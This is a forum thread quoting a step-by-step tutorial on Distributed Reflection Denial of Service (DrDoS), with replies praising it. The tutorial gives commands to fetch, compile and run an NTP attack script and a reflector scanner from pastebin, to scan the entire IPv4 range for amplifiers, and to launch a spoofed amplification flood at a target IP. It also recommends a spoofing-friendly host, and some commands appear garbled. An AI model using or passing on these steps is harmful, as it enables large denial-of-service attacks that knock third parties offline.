Upgrade now, save 50% off for a limited time! Click here to upgrade.

[TUTORIAL] DrDoS
#11
Very nice tutorial very self explanatory and nice layered out keep it up.
Reply
#12
Great tutorial for this bot, vouch!
Reply
#13
ohhh man i want to see
Reply
#14
(10-10-2016, 04:35 AM)LucasYegorov Wrote:
DrDoS

1.0 Introduction to DrDoS
Distributed Reflection Denial of Service, also known as DrDoS has been used for years to create some of the world's largest DDoS attacks! Over the past 5-6 years it has gotten so easy that now anyone can do it with just $10 and some simple knowledge of the Linux OS. Many people use DrDoS in combination with botnets, controlling mass quantities of bots that are able to launch a reflected attack can be overpowering to some. DrDoS is often used in DDoS for Hire sites.

Reflection takes advantage of UDP services. UDP, by design, is a connectionless internet protocol in which the reciever does not fully validate the IPv4 address of the source. This lack of validation makes it possible for someone to pretent to be you! Since it seems like the packets are coming from the target's IP, typically it will send all requests back said IP. This serves 2 purposes of the attack, attack can hide his identity and amplify the attacks greatly.
1.1 Types of Amplification Vectors
In the past there was only DNS amplification, until people started experimenting with other UDP based protocols. Each protocol has a different Bandwidth Amplification Factor, meaning one method might amplify.
100Mbps -> 5000Mbps while another might give you this result: 100Mbps -> 1000Mbps
Here is but a short list of protocols you can abuse:
DNS
CHARGEN
NTP
SNMPv2
SSDP
Quote of the Day
Teamspeak 3
Quake Network Protocol
BitTorrent
NetBIOS
MSSQL
PORTMAP
RIP
2.0 Launching a DrDoS Attack
This tutorial is focused around the NTP attack vector.
[Image: Abusing+Network+Time+Protocol+(NTP)+to+p...attack.jpg]

Here is what you will need for this
  • Common Sense
  • Spoofed Dedicated Server with Ubuntu 14.04 64bit Installed
  • Server for reflector scanning
Here is a host that allows IP Header Modification (Spoofing):




1.) First you need to setup your attacking server. You can login using a SSH client called PuTTy.
[Image: bb874f939b38428bafad5e30cf8d2da4.png]

2.) You will need to install the dependencies for you to run the attack script
Code:
apt-get install gcc wget

3.) Now install the NTP Attack Script:
Code:
wget -q http://pastebin.com/raw/fcyCGWqw -O ntp.c; gcc -o ntp ntp.c -pthread; rm -dbleaker.com ntp.c; ./ntp

4.) Here is where you login to your scanning server! And run these commands
Code:
apt-get install gcc wget -y; wget -q http://pastebin.com/raw/XWFfm5hh -O ntpscan.c; gcc -o ntpscan ntpscan.c -pthread; rm -dbleaker.com ntpscan.c; ./ntpscan
Code:
Example for scanning: ./ntpscan 1.0.0.0 255.255.255.255 ntp.txt 3 5


Should look something like this:
[Image: 94f2696d150f40e0acb745ac95343ecc.png]
5.) Filtering your reflection lists:

You will often get multipe IPs in one list. Sorts out any duplicate IPs :
cat scanned.txt | sort -u > unique.txt

Sorts IPs over certain response size(ex: 300):
cat scannedlist.txt |awk '{if($2>300)print $1}' | sort -u > output.txt
6.) Now log back into your attacking server and upload your new filtered reflection list of NTP servers. And use this command 
to start an attack. Time is in seconds.

Code:
Usage: ./ntp [IP] [file] [threads] [limiter] [time]
Ex: ./ntp 75.14.61.198 ntp.txt 1 -1 300

7.) Here are some results of the successful amplification against another target:
[Image: 14af945bb98749e9a0e65765ddd1594e.png]

lovely product
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)